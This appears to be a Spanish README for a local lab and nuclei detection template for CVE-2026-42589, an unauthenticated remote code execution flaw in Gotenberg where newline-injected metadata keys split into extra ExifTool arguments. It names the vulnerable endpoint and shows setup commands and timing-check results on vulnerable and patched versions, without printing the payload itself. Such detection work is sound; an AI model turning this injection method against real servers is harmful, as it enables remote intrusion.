
POC_CVE-2026-42589
Laboratorio de reproducción local y borrador de plantilla de nuclei para CVE-2026-42589 que afecta a Gotenberg.
CVE-2026-42589 es un problema de ejecución remota de código no autenticado en Gotenberg causado por la inyección de nuevas líneas en la clave de metadatos en:
POST /forms/pdfengines/metadata/write
Gotenberg afectado reenvía las claves de metadatos controladas por el usuario a ExifTool sin rechazar caracteres de control. Una clave de metadatos que contiene nuevas líneas escapadas en JSON puede dividirse en argumentos adicionales de ExifTool.
Este laboratorio se utilizó para validar:
gotenberg/gotenberg:8.29.1gotenberg/gotenberg:8.31.0La plantilla de nuclei utiliza solo una verificación de tiempo no destructiva con sleep 6.
docker-compose.ymldocker-compose.latest.ymlCVE-2026-42589.yamlmanual_verify.pysample.pdfREADME.mdInicia Gotenberg 8.29.1:
docker compose down -v
docker compose up -d
docker compose logs --tail=100 gotenberg
Verifica la versión:
curl -s http://127.0.0.1:3000/version
Verificación manual de tiempo multipart sin procesar:
python3 manual_verify.py http://127.0.0.1:3000
Señal vulnerable esperada:
HTTP/1.1 500 Internal Server Error
TOTAL_TIME=6.xs
Resultado vulnerable observado:
HTTP/1.1 500 Internal Server Error
TOTAL_TIME=6.300s
Internal Server Error
Inicia Gotenberg 8.31.0:
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 gotenberg
Verifica la versión:
curl -s http://127.0.0.1:3000/version
Ejecuta la misma verificación de tiempo manual:
python3 manual_verify.py http://127.0.0.1:3000
Resultado de versión parcheada observado:
HTTP/1.1 400 Bad Request
TOTAL_TIME=0.145s
At least one PDF engine cannot process the requested metadata, while others may have failed to convert due to different issues
Valida la plantilla:
nuclei -duc -validate -t CVE-2026-42589.yaml
Ejecuta contra el objetivo vulnerable:
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2026-42589.yaml
Comportamiento esperado:
8.29.1: coincidencia después de la respuesta 500 retardada8.31.0: sin coincidenciaResultado vulnerable observado:
[CVE-2026-42589] [http] [critical] http://127.0.0.1:3000/forms/pdfengines/metadata/write
[INF] Scan completed in 6.245907708s. 1 matches found.
Resultado de versión parcheada observado:
[INF] Scan completed in 93.01425ms. No results found.